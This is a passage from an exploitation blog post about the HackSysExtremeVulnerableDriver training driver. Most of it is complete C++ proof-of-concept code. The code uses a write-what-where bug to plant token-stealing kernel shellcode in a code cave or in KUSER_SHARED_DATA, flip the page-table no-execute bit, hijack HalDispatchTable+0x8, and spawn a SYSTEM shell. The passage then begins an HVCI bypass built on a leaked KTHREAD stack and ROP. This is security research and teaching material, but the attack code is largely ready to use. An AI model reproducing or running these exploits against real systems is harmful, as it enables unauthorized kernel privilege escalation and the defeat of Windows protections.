            L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE,
            FILE_SHARE_WRITE,
            nullptr,
            OPEN_EXISTING,
            0,
            nullptr);
    
        if (hDriver == INVALID_HANDLE_VALUE)
        {
            printf("[!] Failed to open handle: %d", GetLastError());
            return 1;
        }
    
        LPVOID nt_addr = getbaseaddress(L"ntoskrnl.exe");
        printf("[+] Nt base address: %p\n", nt_addr);
        LPVOID hevd_addr = getbaseaddress(L"HEVD.sys");
        printf("[+] HEVD base address: %p\n", hevd_addr);
    
        LPVOID shellcode_start = (LPVOID)((uintptr_t)hevd_addr + 0x3000 + 0x20);
        LPVOID kernelShellcode = (LPVOID)((uintptr_t)hevd_addr + 0x3000 + 0x20);
        printf("[+] Address of Shellcode in kernel space: %p\n", shellcode_start);
    
        // Step 2
    
        BYTE shellcode[] = {
            0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,
            0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, 0x49, 0x89,
            0xC0, 0x4D, 0x8B, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49,
            0x81, 0xE8, 0x48, 0x04, 0x00, 0x00, 0x4D, 0x8B, 0x88,
            0x40, 0x04, 0x00, 0x00, 0x49, 0x83, 0xF9, 0x04, 0x75,
            0xE5, 0x49, 0x8B, 0x88, 0xB8, 0x04, 0x00, 0x00, 0x80,
            0xE1, 0xF0, 0x48, 0x89, 0x88, 0xB8, 0x04, 0x00, 0x00,
            0x31, 0xC0, 0xC3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff
        };
    
        size_t size = sizeof(shellcode);
        size_t num_chunks = size / 8;
    
        uint64_t* chunks = new uint64_t[num_chunks];
    
        for (size_t i = 0; i < num_chunks; i++) {
            std::memcpy(&chunks[i], &shellcode[i * 8], 8);
    
            input.WHAT = (LPVOID)(&chunks[i]);
            input.WHERE = (LPVOID)(shellcode_start);
    
            printf("[+] Calling TriggerArbitraryWrite to Write Shellcode in 0x%p....", shellcode_start);
    
            success = DeviceIoControl(
                hDriver,
                WRITE_WHAT_WHERE_IOCTL,
                &input,
                sizeof(input),
                nullptr,
                0,
                nullptr,
                nullptr);
    
            if (success) {
                printf("success\n");
            }
            else {
                printf("failed\n");
                return 1;
            }
    
            shellcode_start = (LPVOID)((uintptr_t)shellcode_start + 0x8);
    
        }
        delete[] chunks;
    
        getchar();
        
        LPVOID PteBase = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
        printf("[+] Allocated region to read MiGetPteAddress+0x13 Address: %p\n", PteBase);
    
        input.WHAT = (LPVOID)((uintptr_t)nt_addr + 0x0027f770 + 0x13);
        input.WHERE = (LPVOID)(PteBase);
    
        printf("[+] Calling TriggerArbitraryWrite....");
    
        success = DeviceIoControl(
            hDriver,
            WRITE_WHAT_WHERE_IOCTL,
            &input,
            sizeof(input),
            nullptr,
            0,
            nullptr,
            nullptr);
    
        if (success) {
            printf("success\n");
        }
        else {
            printf("failed\n");
            return 1;
        }
    
        LPVOID* basePTE = (LPVOID*)PteBase;
        printf("[+] Base address of PTE: %p\n", *basePTE);
    
        uintptr_t ShellcodePte = MiGetPte(kernelShellcode);
    
        uintptr_t actualPTE = (uintptr_t)*basePTE + ShellcodePte;
        printf("[+] PTE of shellcode address: %p\n", actualPTE);
    
        getchar();
    
        // Step 3
    
        LPVOID pfnShellcode = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
        printf("[+] Allocated region to read PFN of shellcode: %p\n", pfnShellcode);
    
        input.WHAT = (LPVOID)(actualPTE);
        input.WHERE = (LPVOID)(pfnShellcode);
    
        printf("[+] Calling TriggerArbitraryWrite....");
    
        success = DeviceIoControl(
            hDriver,
            WRITE_WHAT_WHERE_IOCTL,
            &input,
            sizeof(input),
            nullptr,
            0,
            nullptr,
            nullptr);
    
        if (success) {
            printf("success\n");
        }
        else {
            printf("failed\n");
            return 1;
        }
    
        LPVOID* pfn = (LPVOID*)pfnShellcode;
        printf("[+] PFN of shellcode address: %p\n", *pfn);
    
        getchar();
    
        // Step 4
    
        uintptr_t modifiedPFN = (uintptr_t)*pfn & 0x0FFFFFFFFFFFFFFF;
        printf("[+] Modified PFN of shellcode with \"E\" flag: %p\n", modifiedPFN);
    
        input.WHAT = (LPVOID)(&modifiedPFN);
        input.WHERE = (LPVOID)(actualPTE);
    
        printf("[+] Calling TriggerArbitraryWrite....");
    
        success = DeviceIoControl(
            hDriver,
            WRITE_WHAT_WHERE_IOCTL,
            &input,
            sizeof(input),
            nullptr,
            0,
            nullptr,
            nullptr);
    
        if (success) {
            printf("success\n");
        }
        else {
            printf("failed\n");
            return 1;
        }
    
        getchar();
    
        // Step 5
    
        input.WHAT = (LPVOID)(&kernelShellcode);
        input.WHERE = (LPVOID)((uintptr_t)nt_addr + 0x00c00a60 + 0x8);
        printf("[+] Overwriting HalDispatchTable+0x8 with: %p\n", kernelShellcode);
        printf("[+] Calling TriggerArbitraryWrite....");
    
        success = DeviceIoControl(
            hDriver,
            WRITE_WHAT_WHERE_IOCTL,
            &input,
            sizeof(input),
            nullptr,
            0,
            nullptr,
            nullptr);
    
        if (success) {
            printf("success\n");
        }
        else {
            printf("failed\n");
            return 1;
        }
    
        getchar();
    
        // Step 6
    
        pNtQueryIntervalProfile NtQueryIntervalProfile = (pNtQueryIntervalProfile)GetProcAddress(
            GetModuleHandle(L"ntdll.dll"), "NtQueryIntervalProfile");
    
        if (!NtQueryIntervalProfile) {
            printf("[-] Unable to find ntdll!NtQueryIntervalProfile\n");
            return 1;
        }
    
        printf("[+] Found ntdll!NtQueryIntervalProfile\n");
        printf("[+] Calling nt!NtQueryIntervalProfile to execute nt!HalDispatchTable+0x8...\n");
    
        ULONG x = 0;
        NtQueryIntervalProfile(
            0x1337,
            &x
        );
    
        printf("[+] Spawning a shell with elevated privileges\n\n");
        system("cmd");
    
        return 0;
    }
    
    

Method (3) - KUSER_SHARED_DATA

Now that we know how to exploit this WRITE-WHAT-WHERE, there is one more common method instead of writing in the driver’s code cave, there is another method utilizing KUSER_SHARED_DATA structure.

According to Microsoft: Source

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

The KUSER_SHARED_DATA structure is being abused for Windows Kernel Exploitation for a while now and as it states this address is always static in both kernel and user space and it also has READ and WRITE permission. But this was fixed after Windows 10 Insider Preview build 20246. However my current Windows 10 PRO Build 19045 (22H2) which is the latest version, does not seems implemented the fix yet.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Checking the static address (0xFFFFF78000000000), there is some data written here already, so those are the values being used by the KUSER_SHARED_DATA structure itself.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Checking the structure size, it’s 0x720 bytes in total and from the microsoft article, it mentioned a single page (4 KB) is allocated for this, that means 0x1000 - 0x720 = 0x8E0 bytes available for our use.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Since we don’t want to touch the KUSER_SHARED_DATA structure, let’s leave the space for that and find a location for our shellcode, I decided to pick KUSER_SHARED_DATA + 0x800 and we can see it’s empty, we got a static code cave. And checking the region, it has READ and WRITE but not EXECUTE, but that’s fine, utilizing WRITE-WHAT-WHERE, we can change that.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Let’s give this a try, it’s gonna be same methodology as what covered is in “Method (2)” except one single change, instead of using HEVD code cave address, we gonna replace that with the static KUSER_SHARED_DATA address.

  • The shellcode_start and kernelShellcode is changed with KUSER_SHARED_DATA + 0x800 address.
int main()
{
    WRITE_WHAT_WHERE input;
    NTSTATUS success;

    printf("[+] Opening handle to driver\n");
    HANDLE hDriver = CreateFileW(
        L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE,
        FILE_SHARE_WRITE,
        nullptr,
        OPEN_EXISTING,
        0,
        nullptr);

    if (hDriver == INVALID_HANDLE_VALUE)
    {
        printf("[!] Failed to open handle: %d", GetLastError());
        return 1;
    }

    LPVOID nt_addr = getbaseaddress(L"ntoskrnl.exe");
    printf("[+] Nt base address: %p\n", nt_addr);

    LPVOID shellcode_start = (LPVOID)(0xFFFFF78000000000 + 0x800); // KUSER_SHARED_DATA + 0x800
    LPVOID kernelShellcode = (LPVOID)(0xFFFFF78000000000 + 0x800); // KUSER_SHARED_DATA + 0x800
    printf("[+] Address of Shellcode in kernel space: %p\n", shellcode_start);

    // Step 2

    BYTE shellcode[] = {
        0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,
        0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, 0x49, 0x89,
        0xC0, 0x4D, 0x8B, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49,
        0x81, 0xE8, 0x48, 0x04, 0x00, 0x00, 0x4D, 0x8B, 0x88,
        0x40, 0x04, 0x00, 0x00, 0x49, 0x83, 0xF9, 0x04, 0x75,
        0xE5, 0x49, 0x8B, 0x88, 0xB8, 0x04, 0x00, 0x00, 0x80,
        0xE1, 0xF0, 0x48, 0x89, 0x88, 0xB8, 0x04, 0x00, 0x00,
        0x31, 0xC0, 0xC3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff
    };

    size_t size = sizeof(shellcode);
    size_t num_chunks = size / 8;

    uint64_t* chunks = new uint64_t[num_chunks];

    for (size_t i = 0; i < num_chunks; i++) {
        std::memcpy(&chunks[i], &shellcode[i * 8], 8);

        input.WHAT = (LPVOID)(&chunks[i]);
        input.WHERE = (LPVOID)(shellcode_start);

        printf("[+] Calling TriggerArbitraryWrite to Write Shellcode in 0x%p....", shellcode_start);

        success = DeviceIoControl(
            hDriver,
            WRITE_WHAT_WHERE_IOCTL,
            &input,
            sizeof(input),
            nullptr,
            0,
            nullptr,
            nullptr);

        if (success) {
            printf("success\n");
        }
        else {
            printf("failed\n");
            return 1;
        }

        shellcode_start = (LPVOID)((uintptr_t)shellcode_start + 0x8);

    }
    
  [ REST OF THEM ARE SAME ]
  
  }

Updated and executed the POC and the shellcode was written to the KUSER_SHARED_DATA + 0x800 (0xFFFFF78000000800) address. I can confirm the same using WinDBG.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

The next step will be calculating the PTE of the KUSER_SHARED_DATA + 0x800 address and get the PTE bits/flags. The values retrieved are same from !pte command.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Modified the bits/flags and cleared the no eXecute bit on our shellcode region:

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

And the HalDispatchTable is also overwritten successfully:

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Finally by calling NtQueryIntervalProfile(), we got the SYSTEM:

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Even everything seems fine and good, but sometimes I get this BSOD CRITICAL_STRUCTURE_CORRUPTION after SYSTEM shell is spawned, maybe some checks kick-in and finds that HalDispatchTable is modified and we did not revert back to it’s original state yet.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

To fix this, added a step to copy the original value before overwriting nt!HalDispatchTable+0x8

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Basically it’s a pointer to nt!HalpSetSystemInformation and now we have a backup of this pointer.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

After overwriting the pointer with our kernel-space shellcode address and executing it we can replace it.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

NtQueryIntervalProfile() function will execute our shellcode and then revert back the nt!HalDispatchTable+0x8 before spawing a new cmd.exe

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Checking back the HalDispatchTable, it reverted back.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

  • Full POC:

    #include <Windows.h>
    #include <stdio.h>
    #include <psapi.h>
    #include <cstdint>
    #include <cstring>
    
    #define WRITE_WHAT_WHERE_IOCTL CTL_CODE(FILE_DEVICE_UNKNOWN, 0x802, METHOD_NEITHER, FILE_ANY_ACCESS)
    
    typedef struct _WRITE_WHAT_WHERE {
        void* WHAT;
        void* WHERE;
    } WRITE_WHAT_WHERE, * PWRITE_WHAT_WHERE;
    
    typedef NTSTATUS(WINAPI* pNtQueryIntervalProfile)(IN ULONG ProfileSource, OUT PULONG Interval);
    
    PVOID getbaseaddress(LPCWSTR name)
    {
        BOOL status;
        LPVOID* pImageBase;
        DWORD ImageSize;
        WCHAR driverName[1024];
        LPVOID driverBase = nullptr;
    
        status = EnumDeviceDrivers(nullptr, 0, &ImageSize);
    
        pImageBase = (LPVOID*)VirtualAlloc(nullptr, ImageSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
    
        status = EnumDeviceDrivers(pImageBase, ImageSize, &ImageSize);
    
        int driver_count = ImageSize / sizeof(pImageBase[0]);
    
        for (int i = 0; i < driver_count; i++) {
            GetDeviceDriverBaseNameW(pImageBase[i], driverName, sizeof(driverName) / sizeof(char));
    
            if (!wcscmp(name, driverName)) {
                driverBase = pImageBase[i];
                break;
            }
        }
    
        return driverBase;
    }
    
    uintptr_t MiGetPte(LPVOID lpMemory) {
        uintptr_t addr = reinterpret_cast<uintptr_t>(lpMemory);
    
        uintptr_t calc1 = addr >> 9; // shr rcx, 9 
        uintptr_t calc2 = calc1 & 0x7FFFFFFFF8; // and rax, rcx
    
        return calc2;
    }
    
    int main()
    {
        WRITE_WHAT_WHERE input;
        NTSTATUS success;
    
        printf("[+] Opening handle to driver\n");
        HANDLE hDriver = CreateFileW(
            L"\\\\.\\HackSysExtremeVulnerableDriver", GENERIC_WRITE,
            FILE_SHARE_WRITE,
            nullptr,
            OPEN_EXISTING,
            0,
            nullptr);
    
        if (hDriver == INVALID_HANDLE_VALUE)
        {
            printf("[!] Failed to open handle: %d", GetLastError());
            return 1;
        }
    
        LPVOID nt_addr = getbaseaddress(L"ntoskrnl.exe");
        printf("[+] Nt base address: %p\n", nt_addr);
    
        LPVOID shellcode_start = (LPVOID)(0xFFFFF78000000000 + 0x800); // KUSER_SHARED_DATA + 0x800
        LPVOID kernelShellcode = (LPVOID)(0xFFFFF78000000000 + 0x800); // KUSER_SHARED_DATA + 0x800
        printf("[+] Address of Shellcode in kernel space: %p\n", shellcode_start);
    
        // Step 2
    
        BYTE shellcode[] = {
            0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,
            0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, 0x49, 0x89,
            0xC0, 0x4D, 0x8B, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49,
            0x81, 0xE8, 0x48, 0x04, 0x00, 0x00, 0x4D, 0x8B, 0x88,
            0x40, 0x04, 0x00, 0x00, 0x49, 0x83, 0xF9, 0x04, 0x75,
            0xE5, 0x49, 0x8B, 0x88, 0xB8, 0x04, 0x00, 0x00, 0x80,
            0xE1, 0xF0, 0x48, 0x89, 0x88, 0xB8, 0x04, 0x00, 0x00,
            0x31, 0xC0, 0xC3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff
        };
    
        size_t size = sizeof(shellcode);
        size_t num_chunks = size / 8;
    
        uint64_t* chunks = new uint64_t[num_chunks];
    
        for (size_t i = 0; i < num_chunks; i++) {
            std::memcpy(&chunks[i], &shellcode[i * 8], 8);
    
            input.WHAT = (LPVOID)(&chunks[i]);
            input.WHERE = (LPVOID)(shellcode_start);
    
            printf("[+] Calling TriggerArbitraryWrite to Write Shellcode in 0x%p....", shellcode_start);
    
            success = DeviceIoControl(
                hDriver,
                WRITE_WHAT_WHERE_IOCTL,
                &input,
                sizeof(input),
                nullptr,
                0,
                nullptr,
                nullptr);
    
            if (success) {
                printf("success\n");
            }
            else {
                printf("failed\n");
                return 1;
            }
    
            shellcode_start = (LPVOID)((uintptr_t)shellcode_start + 0x8);
    
        }
        delete[] chunks;
    
        getchar();
    
        // Step 3
    
        LPVOID PteBase = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
        printf("[+] Allocated region to read MiGetPteAddress+0x13 Address: %p\n", PteBase);
    
        input.WHAT = (LPVOID)((uintptr_t)nt_addr + 0x0027f770 + 0x13);
        input.WHERE = (LPVOID)(PteBase);
    
        printf("[+] Calling TriggerArbitraryWrite....");
    
        success = DeviceIoControl(
            hDriver,
            WRITE_WHAT_WHERE_IOCTL,
            &input,
            sizeof(input),
            nullptr,
            0,
            nullptr,
            nullptr);
    
        if (success) {
            printf("success\n");
        }
        else {
            printf("failed\n");
            return 1;
        }
    
        LPVOID* basePTE = (LPVOID*)PteBase;
        printf("[+] Base address of PTE: %p\n", *basePTE);
    
        uintptr_t ShellcodePte = MiGetPte(kernelShellcode);
    
        uintptr_t actualPTE = (uintptr_t)*basePTE + ShellcodePte;
        printf("[+] PTE of shellcode address: %p\n", actualPTE);
    
        getchar();
    
        LPVOID pfnShellcode = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
        printf("[+] Allocated region to read PFN of shellcode: %p\n", pfnShellcode);
    
        input.WHAT = (LPVOID)(actualPTE);
        input.WHERE = (LPVOID)(pfnShellcode);
    
        printf("[+] Calling TriggerArbitraryWrite....");
    
        success = DeviceIoControl(
            hDriver,
            WRITE_WHAT_WHERE_IOCTL,
            &input,
            sizeof(input),
            nullptr,
            0,
            nullptr,
            nullptr);
    
        if (success) {
            printf("success\n");
        }
        else {
            printf("failed\n");
            return 1;
        }
    
        LPVOID* pfn = (LPVOID*)pfnShellcode;
        printf("[+] PFN of shellcode address: %p\n", *pfn);
    
        getchar();
    
        // Step 4
    
        uintptr_t modifiedPFN = (uintptr_t)*pfn & 0x0FFFFFFFFFFFFFFF;
        printf("[+] Modified PFN of shellcode with \"E\" flag: %p\n", modifiedPFN);
    
        input.WHAT = (LPVOID)(&modifiedPFN);
        input.WHERE = (LPVOID)(actualPTE);
    
        printf("[+] Calling TriggerArbitraryWrite....");
    
        success = DeviceIoControl(
            hDriver,
            WRITE_WHAT_WHERE_IOCTL,
            &input,
            sizeof(input),
            nullptr,
            0,
            nullptr,
            nullptr);
    
        if (success) {
            printf("success\n");
        }
        else {
            printf("failed\n");
            return 1;
        }
    
        getchar();
    
        // Step 5
    
        LPVOID halPointer = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
        printf("[+] Allocated region to read HalDispatchTable+0x8 pointer: %p\n", halPointer);
    
        input.WHAT = (LPVOID)((uintptr_t)nt_addr + 0x00c00a60 + 0x8); // HalDispatchTable+0x8
        input.WHERE = (LPVOID)(halPointer);
    
        printf("[+] Calling TriggerArbitraryWrite....");
    
        success = DeviceIoControl(
            hDriver,
            WRITE_WHAT_WHERE_IOCTL,
            &input,
            sizeof(input),
            nullptr,
            0,
            nullptr,
            nullptr);
    
        if (success) {
            printf("success\n");
        }
        else {
            printf("failed\n");
            return 1;
        }
    
        LPVOID* hal0x8 = (LPVOID*)halPointer;
        printf("[+] Original pointer stored in HalDispatchTable+0x8: %p\n", *hal0x8);
    
        getchar();
    
        // Step 6
    
        input.WHAT = (LPVOID)(&kernelShellcode);
        input.WHERE = (LPVOID)((uintptr_t)nt_addr + 0x00c00a60 + 0x8); // HalDispatchTable+0x8
        printf("[+] Overwriting HalDispatchTable+0x8 with: %p\n", kernelShellcode);
        printf("[+] Calling TriggerArbitraryWrite....");
    
        success = DeviceIoControl(
            hDriver,
            WRITE_WHAT_WHERE_IOCTL,
            &input,
            sizeof(input),
            nullptr,
            0,
            nullptr,
            nullptr);
    
        if (success) {
            printf("success\n");
        }
        else {
            printf("failed\n");
            return 1;
        }
    
        getchar();
    
        // Step 7
    
        pNtQueryIntervalProfile NtQueryIntervalProfile = (pNtQueryIntervalProfile)GetProcAddress(
            GetModuleHandle(L"ntdll.dll"), "NtQueryIntervalProfile");
    
        if (!NtQueryIntervalProfile) {
            printf("[-] Unable to find ntdll!NtQueryIntervalProfile\n");
            return 1;
        }
    
        printf("[+] Found ntdll!NtQueryIntervalProfile\n");
        printf("[+] Calling nt!NtQueryIntervalProfile to execute nt!HalDispatchTable+0x8...\n");
    
        ULONG x = 0;
        NtQueryIntervalProfile(
            0x1337,
            &x
        );
    
        // Step 8
    
        printf("[+] Reverting HalDispatchTable+0x8 to it's original state...\n");
        input.WHAT = (LPVOID)(hal0x8); 
        input.WHERE = (LPVOID)((uintptr_t)nt_addr + 0x00c00a60 + 0x8); // HalDispatchTable+0x8
    
        printf("[+] Calling TriggerArbitraryWrite....");
    
        success = DeviceIoControl(
            hDriver,
            WRITE_WHAT_WHERE_IOCTL,
            &input,
            sizeof(input),
            nullptr,
            0,
            nullptr,
            nullptr);
    
        if (success) {
            printf("success\n");
        }
        else {
            printf("failed\n");
            return 1;
        }
    
        getchar();
    
        printf("[+] Spawning a shell with elevated privileges\n\n");
        system("cmd");
    
        return 0;
    }
    

Method (4) - HVCI (Memory Integrity) Enabled

Now all of the above attacks worked with Virtualization-based Security (VBS) enabled but Hypervisor-Enforced Code Integrity (HVCI) or Memory Integrity is disabled in the VM machine.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Enabled HVCI and restarted the machine to try the above exploits again, it ends up with the following error:

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

This is because, isolation is implemented through Virtual Trust Levels (VTLs), which I have already explained in: https://ghostbyt3.github.io/blog/Kernel_Exploitation_Primer_0x3#hyper-v.

So in our attack, we have flipped the PTE bits/flags and cleared the no eXecute bit in VTL0, however EPT (Extended Page Tables) in VTL1 does not have this change and it blocks our exploit.

# PTE before clearing the no eXecute bit
---DA--KW-V

# PTE after clearing the no eXecute bit
---DA--KWEV

# EPTE
---DA--W-V

Additionally, with HVCI and VBS enabled, kCFG (kernel control flow guard) is also fully enabled. The kCFG bitmap (nt!guard_icall_bitmap) (bitmap is used to track which function addresses are valid call targets) is also protected by EPTE, so we can’t overwrite it. However kCFG protects function pointers (like nt!HalDispatchTable + 0x8) but does not protect return addresses. This means that while we cannot modify function pointers to redirect execution arbitrarily, we can overwrite a return address on the stack to hijack control flow. This is what we gonna do now.

Like I mentioned in my previous post, we can’t execute unsigned-code within the Windows kernel. But we can leverage ROP chain to call kernel-mode functions, I have also attempted similar function calls in previous post, but I couldn’t make it reliable, but let’s try that with WRITE-WHAT-WHERE vulnerability with different methodology. I am following the methodology as Connor McGarr mentioned in his blog post. I highly recommend to read that.

This is what we gonna do to get around the HVCI and abuse WRITE-WHAT-WHERE to make Kernel function calls:

  • Step 1: Create a dummy thread in suspended state using CreateThread() API.
  • Step 2: Using NtQuerySystemInformation() API leak the KTHREAD structure address of the suspended thread.
  • Step 3: From the KTHREAD structure we retrieve KTHREAD.StackBase which is the kernel-mode stack address of the thread.
  • Step 4: From the stack we will be looking for a specific function’s ret address, as you know when a function call occurred, the next instruction’s address is pushed to the stack, so after the execution of the call, the ret instruction will pop the return address from stack and jump to it, and kCFG (kernel control flow guard) does not inspect this hijack, so we are gonna find a specific return address (more on this later) and replace that with our ROP chain which makes a kernel function call.
  • Step 5: Once we found the return address in the stack, we will write the rest of the ROP chain, to make a call to ZwOpenProcess() to get a PROCESS_ALL_ACCESS handle on system.exe.
  • Step 6: Then at the end our ROP chain with a call to the kernel-mode function ZwTerminateThread(), which will terminate the dummy thread because we messed the stack, it will cause BSOD if we didn’t do this.
  • Step 7: Finally, we resume the thread using ResumeThread() API, while continuing the thread, it will land on the return address in the stack which we have overwritten and it will start executing our ROP chain and get the handle to the system process and at the end terminates itself.

Step 1: Creating a dummy thread

  • Creating a dummy thread can be done easily by calling CreateThread() API with CREATE_SUSPENDED as dwCreationFlags.
  • Once the thread is created, it will return a handle to the dummy suspended thread (dHandle).
  • Also, we need to mention what function the thread needs to execute once it is resumed, for that I provided a dummy function called donoting().
void donothing()
{
    return;
}

HANDLE fakethread() {

    HANDLE dHandle = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)donothing, NULL, CREATE_SUSPENDED, NULL);

    if (!dHandle) {
        printf("[-] Failed creating a suspended thread..\n");
    }
    else {
        printf("[+] Dummy thread Handle: %d\n", dHandle);
    }

    return dHandle;
}

int main()
{

    printf("[+] Creating a dummy thread..\n");
    HANDLE dHandle = fakethread();
    if (!dHandle) {
        return 1;
    }
    
    return 0;
}

Step 2: Leak KTHREAD address

  • Now we need to retrieve the KTHREAD of the dummy thread, for that we can use NtQuerySystemInformation() API function.
  • Since we need the information related to handles , we will be using SystemHandleInformation in the SystemInformationClass member, which indicate the kind of system information to be retrieved.
  • We need the following structures for this process: SYSTEM_INFORMATION_CLASS, SYSTEM_HANDLE_INFORMATION, SYSTEM_HANDLE_TABLE_ENTRY_INFO.
  • The SystemHandleInformation class, will provide all the handle information in the machine.
  • From the NtQuerySystemInformation() API call, we will be storing all of these handle information in SystemHandleInfo. However, we need to provide the required size to store all of these handle information, which we can’t predict. We can just allocate a huge space but that’s not reliable.
  • To solve this issue, I started with size 0x1000 bytes and gradually increased until it does not get STATUS_INFO_LENGTH_MISMATCH status.
  • Then it parses every handle and check the handle’s UniqueProcessId is as same as the current process ID. Once the current process is discovered, it starts to check the handle which we provided via argument with all the handles of the process.
  • Once the specific handle is discovered, we can get the object address with the help of _SYSTEM_HANDLE_TABLE_ENTRY_INFO which contains a member called Object which is the address of the specific object, in this case we are looking for the dummy “thread” handle, so the object is thread, this means the Object member holds the KTHREAD address of the specific handle.
PVOID findKTHREAD(HANDLE dHandle) {

    pNtQuerySystemInformation NtQuerySystemInformation = (pNtQuerySystemInformation)GetProcAddress(
        GetModuleHandle(L"ntdll.dll"), "NtQuerySystemInformation");

    if (!NtQuerySystemInformation) {
        printf("[-] Unable to find ntdll!NtQuerySystemInformation\n");
        return FALSE;
    }

    printf("[+] Found ntdll!NtQuerySystemInformation\n");

    ULONG returnLen = 0x1000;
    NTSTATUS success, status;

    PSYSTEM_HANDLE_INFORMATION SystemHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, (SIZE_T)returnLen);

    do {
        if (SystemHandleInfo) {
            HeapFree(GetProcessHeap(), 0, SystemHandleInfo);
        }

        SystemHandleInfo = (PSYSTEM_HANDLE_INFORMATION)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, returnLen);
        if (!SystemHandleInfo) {
            printf("[-] HeapAlloc Failed With Error: %d\n", GetLastError());
            return FALSE;
        }

        status = NtQuerySystemInformation(SystemHandleInformation, SystemHandleInfo, returnLen, &returnLen);
    } while (status == STATUS_INFO_LENGTH_MISMATCH);

    PVOID dKTHREAD = NULL;
    for (ULONG i = 0; i < SystemHandleInfo->NumberOfHandles; i++)
    {
        if (SystemHandleInfo->Handles[i].UniqueProcessId == GetCurrentProcessId())
        {
            if (dHandle == (HANDLE)SystemHandleInfo->Handles[i].HandleValue)
            {
               dKTHREAD = SystemHandleInfo->Handles[i].Object;
               printf("[+] Found KTHREAD of the dummy thread %p\n", dKTHREAD);
               free(SystemHandleInfo);
               break;
            }
        }
    }
    HeapFree(GetProcessHeap(), 0, SystemHandleInfo);
    return dKTHREAD;
}

Executed the POC and it created a dummy thread with handle 0xA8. Using Process Explorer, we can cross verify the KTHREAD leaked address from POC is same as from Process Explorer, so our script works fine.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Step 3: Retrieving kernel stack address

KTHREAD is a structure associated with every thread, this contains every information about the thread (which is an another big topic which I can not cover now). But this is all we need to know now, KTHREAD contains 2 interesting members which is required for the upcoming steps, we need their offsets:

  • StackLimit - offset 0x30
  • StackBase - offset 0x38

As I said earlier, each thread has it’s own stack and it’s stack address can be retrieved through StackBase member of KTHREAD.

https://raw.githubusercontent.com/ghostbyt3/ghostbyt3.github.io/master/public/static/images/kernel_0x5/image.png

Now we already have a KTHREAD address, we can calculate the address of StackLimit and StackBase and read the actual values using WRITE-WHAT-WHERE, just like what we did in previous methods.

Created a kernelRead() function which will read the provided address (as argument readAddr) and read the value from that address by calling the TriggerArbitraryWrite() function.

PVOID kernelRead(PVOID readAddr, HANDLE hDriver) {

    WRITE_WHAT_WHERE input;
    LPVOID storeAddr = VirtualAlloc(NULL, sizeof(LPVOID), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);

    input.WHAT = (LPVOID)(readAddr);
    input.WHERE = (LPVOID)(storeAddr);

    printf("[+] Calling TriggerArbitraryWrite to Read %p....", readAddr);
    NTSTATUS success = DeviceIoControl(
        hDriver,
        WRITE_WHAT_WHERE_IOCTL,
        &input,
        sizeof(input),
        nullptr,
        0,
        nullptr,
        nullptr);

    if (success) {
        printf("success\n");
    }
    else {
        printf("failed\n");
        return FALSE;
    }

    LPVOID* data = (LPVOID*)storeAddr;
    return *data;
}

